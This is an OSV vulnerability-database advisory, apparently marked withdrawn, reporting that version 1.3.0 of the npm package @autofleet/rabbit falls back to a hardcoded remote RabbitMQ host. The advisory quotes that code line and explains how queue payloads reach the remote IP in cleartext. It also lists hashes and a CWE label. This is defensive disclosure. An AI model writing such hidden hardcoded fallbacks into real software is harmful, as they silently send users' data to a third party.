MAL-2026-4787

See a problem?

Import Source

https://github.com/ossf/malicious-packages/blob/main/osv/withdrawn/npm/@autofleet/rabbit/MAL-2026-4787.json

JSON Data

https://api.osv.dev/v1/vulns/MAL-2026-4787

Withdrawn

2026-05-26T20:50:05Z

Published

2026-05-26T08:09:30Z

Modified

2026-05-27T00:32:00.998960936Z

Summary

Malicious code in @autofleet/rabbit (npm)

Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (a766d89a5ed19491bd107e5d31c79fbbe7a9be9bce2a957b290408fb9f54140c)

The package's compiled entry (dist/index.js:48) defines let host = process.env.RABBITMQ_SERVICE_HOST || '35.240.13.28' and then connects via amqp_connection_manager.connect(['amqp://' + host]). Any consumer that uses the advertised publish / sendToQueue / consume APIs without explicitly setting RABBITMQSERVICEHOST will silently connect to 35.240.13.28 (a Google Compute Engine IP) over plaintext AMQP and ship the caller's queue/exchange payloads to that fixed remote host. The hardcoded fallback is not documented anywhere in the package metadata (description is empty), so installers have no notice that omitting the env var causes their message traffic to leave their environment. The connection is made over amqp:// (port 5672, no TLS), so payloads also traverse the network in cleartext, compounding the leak. This is a silent-relay shape: normal use of the library's documented API moves caller-supplied data to a publisher-chosen destination.

Database specific

{
    "malicious-packages-origins": [
        {
            "sha256": "a766d89a5ed19491bd107e5d31c79fbbe7a9be9bce2a957b290408fb9f54140c",
            "import_time": "2026-05-26T09:17:32.017497589Z",
            "source": "amazon-inspector",
            "modified_time": "2026-05-26T08:09:30Z",
            "versions": [
                "1.3.0"
            ],
            "id": "IN-MAL-2026-004868"
        }
    ]
}

References

https://www.npmjs.com/package/@autofleet/rabbit/v/1.3.0

Credits

- Amazon Inspector - FINDER
- - actran@amazon.com

Affected packages

npm / @autofleet/rabbit

Package

Name: @autofleet/rabbit; View open source insights on deps.dev
Purl: pkg:npm/%40autofleet%2Frabbit

Affected ranges

Affected versions

1.*

1.3.0

Database specific

indicators

{
    "package_integrity": [
        {
            "filename": "rabbit-1.3.0.tgz",
            "hashes": {
                "sha512_sri": "sha512-QZvovIx6BfzUEarXCrno4IsuvcPV4BFPrs0jCgXnsJynR36d3ZHKpD/MLh80PBbQ0GD2EEPwmmc7ejrAnEy+Bw==",
                "sha1": "f9140b65fb6e2e28c7e85ff3af16ad58a6665cca"
            }
        }
    ],
    "evidence_files": [
        {
            "sha256": "96f97ad9d859886d466d246c7b940cca3ded7e9125ffc7fd17a758464c53db6a",
            "tlsh": "46a1afa074bf2531456370a84a6f6101203cee17b405ce587abca9d0dfb6260e9e7ff5",
            "path": "dist/index.js"
        }
    ]
}

source

"https://github.com/ossf/malicious-packages/blob/main/osv/withdrawn/npm/@autofleet/rabbit/MAL-2026-4787.json"

cwes

[
    {
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature."
    }
]